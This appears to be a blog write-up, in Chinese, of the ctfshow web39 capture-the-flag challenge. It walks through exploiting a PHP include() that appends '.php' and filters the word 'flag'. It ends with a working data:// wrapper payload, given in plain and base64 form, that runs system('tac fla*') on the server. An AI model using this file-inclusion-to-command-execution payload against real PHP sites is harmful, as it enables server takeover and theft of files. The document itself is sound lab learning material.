文件包含之include-ctfshow-web39

记录一下自己的思路和正确的解法

一、代码如下,主要逻辑就是传参、拼接、包含。

php 复制代码
//flag in flag.php
error_reporting(0);
if(isset($_GET['c'])){
    $c = $_GET['c'];
    if(!preg_match("/flag/i", $c)){
        include($c.".php");
    }
        
}else{
    highlight_file(__FILE__);
}

二、自己的思路

1、url编码:?c=%66%6C%61%67。行不通,因为php接收到之后会进行解码处理得到字符串flag,过滤掉了。双重编码也是一样的。

2、filter伪协议:/?c=php://filter/read=convert.base64-encode/resource=flag。

这个折腾了好久,主要原因是当输入这个时,实际上被执行的代码是

php 复制代码
include("php://filter/.../resource=flag.php");

php://filter 协议会去读取 flag.php 这个文件,并将其内容进行 Base64 编码输出。(PD9waHAgcGhwaW5mbygpOw==)然后include函数去执行这个字符串,但是这个字符串不是合法的PHP代码,出现解析错误。也就是说,你把"钥匙"(Base64 编码)给了服务器,服务器用这把钥匙开锁后,发现里面还有一把锁(乱码),它不知道怎么处理,就报错了。你需要的是直接让服务器把"钥匙"显示给你看,而不是让它去执行"钥匙"。

3、data伪协议:?c=data://text/plain;base64,ZmxhZw==

跟上面一样,还是对include函数的理解有误。include() 是用来执行代码的,而不是用来显示文本内容的。传入的 base64 解码后是 flag,这只是一个字符串,PHP 执行它时不会有任何输出,它也不是一个文件路径。实际上执行的是

php 复制代码
include("data://text/plain;base64,flag");

相当于是让php去执行代码flag,这是flag既不是命令,也不是函数,也不是变量,无法执行。

4、正确的解法,需要让 PHP 去执行 能读取文件的命令(如 system())。最终payload:

php 复制代码
data://text/plain,<?=system('tac fla*');?>
或者
?c=data://text/plain;base64,PD9waHAgc3lzdGVtKCd0YWMgZionKTs/Pg==
  • 含义:包含并执行 <?=system('tac f*');?> 这段代码。
  • 这段代码会主动去读取 flag.php 的内容,并打印到屏幕上
  • 虽然代码末尾会拼接 .php(变成 data://...?>.php),但 data:// 协议在处理流数据时,通常会忽略末尾的 .php 后缀,或者将其视为数据流的一部分而不影响前面代码的执行
相关推荐
Pure_White_Sword2 天前
bugku-reverse题目-peter的手机
网络安全·ctf·reverse·逆向工程
缘木之鱼2 天前
CTFshow __Web应用安全与防护 第二章
前端·安全·渗透·ctf·ctfshow
给勒布朗上上对抗呀3 天前
伪随机数实战-ctfshow-web25
ctf
三七吃山漆3 天前
[护网杯 2018]easy_tornado
python·web安全·ctf·tornado
缘木之鱼3 天前
CTFshow __Web应用安全与防护 第一章
前端·安全·渗透·ctf·ctfshow
王解7 天前
game1
学习·ctf
23zhgjx-zgx8 天前
SQL注入攻击分析报告
网络·sql·ctf
给勒布朗上上对抗呀8 天前
XSS实战-Bugku-zombie-10
ctf·xss
王解8 天前
本地管理员
学习·ctf